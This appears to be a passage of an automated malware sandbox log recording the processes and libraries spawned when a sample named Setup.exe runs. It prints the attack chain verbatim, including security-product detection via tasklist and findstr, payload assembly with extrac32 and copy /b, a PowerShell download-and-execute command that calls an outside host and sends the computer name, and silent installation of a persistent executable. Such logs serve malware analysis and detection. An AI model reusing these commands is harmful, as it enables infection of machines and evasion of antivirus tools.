        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpProcess created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe"
        Source: C:\Users\user\Desktop\Setup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Archive Archive.cmd & Archive.cmdJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 811185Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E ThousandJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "makes" Makes Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 811185\M.com + Symbol + Bang + Sons + Prefix + Re + Answers + Frank + Chancellor + Enable 811185\M.comJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Gather + ..\Intend + ..\Couple + ..\Und + ..\Desktop + ..\Laboratories + ..\Leonard cJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com M.com cJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Jump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comProcess created: C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe "C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exeProcess created: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmp "C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmp" /SL5="$60296,7785838,845824,C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe" Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpProcess created: C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe "C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe" /VERYSILENTJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exeProcess created: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmp "C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmp" /SL5="$70296,7785838,845824,C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe" /VERYSILENT
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpProcess created: C:\Windows\System32\timeout.exe "timeout" 9
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpProcess created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
        Source: C:\Users\user\Desktop\Setup.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeSection loaded: acgenral.dllJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeSection loaded: samcli.dllJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeSection loaded: msacm32.dllJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeSection loaded: slc.dllJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dllJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: wsock32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: napinsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: wshbth.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: nlaapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: winrnr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: webio.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: amsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: wtsapi32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: winsta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpSection loaded: wintypes.dllJump to behavior
